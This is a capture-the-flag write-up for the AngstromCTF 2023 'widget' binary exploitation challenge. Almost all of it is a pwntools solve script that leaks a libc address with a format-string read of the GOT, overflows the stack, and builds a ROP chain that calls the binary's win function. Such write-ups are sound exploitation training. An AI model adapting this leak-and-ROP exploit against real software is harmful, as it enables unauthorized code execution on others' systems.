widget

05/04/2023

By: unvariant

Tags: pwn AngstromCTF-2023

Problem Description:

I seem to have lost my gadgets.

Hints:

Reveal Hints

None

Solve script

from pwn import *

file = ELF("./widget")

if args.REMOTE:
    io = remote("challs.actf.co", 31320)
    pow = io.recvline().split(b": ")[1]
    pow = process(["/bin/sh", "-c", pow])
    res = pow.recvline()
    print(res)
    io.sendline(res)
else:
    io = process("./widget")

ret = 0x4014c7
main = 0x4013d9
bp = 0x404800

attack =  b"%10$s".ljust(16, b"\x00") + p64(file.got["puts"])
attack =  attack.ljust(0x20, b"A")
attack += p64(bp) + p64(main)

io.recvuntil(b": ")
io.sendline(str(len(attack)).encode())

io.recvuntil(b": ")
io.send(attack)

io.recvuntil(b"Your input: ")
leak = io.recvuntil(b"Amount").strip(b"Amount")
leak = u64(leak.ljust(8, b"\x00"))
print(f"leak: {leak:x}")
base = leak - 0x80ed0
print(f"base: {base:x}")

input("wait: ")

rdi = 0x2a3e5
rsi = 0x2be51
attack = b"A" * 0x28 + p64(base + rdi) + p64(0x402008) + p64(base + rsi) + p64(0x402029) + p64(ret) + p64(file.symbols["win"])

io.recvuntil(b": ")
io.sendline(str(len(attack)).encode())

io.recvuntil(b": ")
io.send(attack)

io.interactive()